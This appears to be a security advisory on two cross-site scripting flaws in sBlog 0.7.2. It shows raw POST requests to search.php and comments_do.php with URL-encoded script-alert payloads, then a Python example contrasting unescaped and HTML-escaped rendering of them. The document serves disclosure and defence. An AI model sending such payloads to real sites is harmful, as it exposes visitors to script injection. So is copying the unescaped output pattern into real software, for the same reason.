sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerabilities
===================================
Information of Software:
Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple, recently released PHP blog. It is very simple
and is used by PHP newcomers.
===================================
Bug:
1) Cross-Site Scripting Vulnerability in the page search.php
sBlog contains a flaw that allows a remote cross-site scripting attack.
The vulnerability is in the search function: the value submitted in the
keyword parameter is echoed back into the page without sanitisation, so a
user can modify the submitted parameter and insert XSS code.
- HTTP Normal POST Request
http://[target]/[path]/search.php
POST /[path]/search.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[path]/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
keyword=casa
- End of Normal POST Request
but we can modify the POST request in this way:
[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E
[....]
---------------------------------------------------------
PoC for the first vulnerability:
entering the string <script>alert("lol");</script> in the search textbox
executes the script in the results page (XSS).
###########################################
2) Cross-Site Scripting Vulnerability in the user name of a post comment
This vulnerability can be exploited by malicious people to conduct
script insertion attacks.
Input passed to the "title" field when editing submitted articles, and
reportedly also when commenting on articles, isn't properly sanitised
before being used. This can be exploited to inject arbitrary HTML and
script code, which will be executed in a user's browser session in the
context of an affected site when the malicious user data is viewed.
- HTTP Normal POST Request
http://[target]/[path]/comments_do.php
POST /[path]/comments_do.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[path]/comments.php?id=news_id
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
blog_id=id_of_news&username=Test&email=&homepage=&comment=Test
but we can modify the username variable in the POST request in this way:
[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&email=&homepage=&comment=test
[....]
---------------------------------------------------------
PoC for the second vulnerability:
entering XSS code, or any HTML code, in the name textbox of the user
comment form executes a cross-site scripting attack when the comment is viewed.
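Added example (not from the advisory and not sBlog's own code) modelling both reported sinks, the keyword field of search.php and the username field of comments_do.php: it decodes the request bodies shown above, renders them once the way an unsanitised page would and once with output encoding (the equivalent of PHP's htmlspecialchars with ENT_QUOTES), and flags fields carrying HTML-significant characters for request or log review. The HTML templates and function names are assumptions.

```python
from html import escape
from urllib.parse import parse_qs

# Request bodies reproduced from the advisory above (constructed test data).
SEARCH_BODY = "keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E"
COMMENT_BODY = ("blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E"
                "&email=&homepage=&comment=test")

# Assumed output templates standing in for the HTML sBlog emits (not sBlog's own markup).
SEARCH_TMPL = "<p>Results for: {keyword}</p>"
COMMENT_TMPL = '<div class="comment"><b>{username}</b> wrote: {comment}</div>'


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body the way PHP fills $_POST:
    percent-decoding applied, first value per key, empty values kept."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(template: str, fields: dict) -> str:
    """The defect the advisory describes: user input placed into HTML as-is."""
    return template.format(**fields)


def render_fixed(template: str, fields: dict) -> str:
    """Hardened form: HTML-encode every user-controlled value before output
    (PHP equivalent: htmlspecialchars($value, ENT_QUOTES))."""
    return template.format(**{k: escape(v, quote=True) for k, v in fields.items()})


def flag_markup_fields(fields: dict) -> list:
    """Detection aid for request or log review: names of fields whose value would
    change under HTML encoding, i.e. contains <, >, &, " or '."""
    return sorted(k for k, v in fields.items() if escape(v, quote=True) != v)


def demo() -> dict:
    search, comment = parse_form(SEARCH_BODY), parse_form(COMMENT_BODY)
    return {
        "search_vuln": render_vulnerable(SEARCH_TMPL, search),
        "search_fixed": render_fixed(SEARCH_TMPL, search),
        "comment_vuln": render_vulnerable(COMMENT_TMPL, comment),
        "comment_fixed": render_fixed(COMMENT_TMPL, comment),
        "flagged": flag_markup_fields(comment),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```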
===================================
Credit:
Author: Kiki
e-mail: [email protected]
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================